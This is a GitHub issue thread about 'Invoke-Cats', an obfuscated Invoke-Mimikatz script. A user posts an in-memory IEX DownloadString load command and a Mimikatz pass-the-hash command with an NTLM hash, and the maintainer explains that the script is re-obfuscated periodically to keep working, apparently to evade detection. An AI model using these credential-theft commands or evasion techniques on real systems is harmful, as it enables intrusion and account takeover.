DanMcInerney / Invoke-Cats

Obfuscated Invoke-Mimikatz
Apache License 2.0
52 stars 16 forks source link

Missing argument #2

Closed XemBryan closed 4 years ago

XemBryan commented 4 years ago

I'm loading to memory:

IEX (New-Object Net.WebClient).DownloadString('C:\Users\aki\Desktop\new\Invoke-Cats.ps1') and then executing Invoke-Catspass the hash with command:

PS C:\Users\Administrator> Invoke-Cats-Command 'sekurlsa::pth /user:Administrator /domain:CISCO /NTLM:someNTLM' returns an error:

ERROR kuhl_m_sekurlsa_pth ; Missing argument : user But the argument is there. It happens on W2012

So the question is: how to write Cats command in Powershell to not complaint about arguments?

DanMcInerney commented 4 years ago

This script is just Invoke-Mimikatz with function names changed and run through Invoke-Obfuscation. It needs to be run through Invoke-Obfuscation every few weeks and then tested which takes a while. I haven't done that in a while so that's why this is happening probably. I don't need to use this script for a while so I probably won't fix it until I need it again.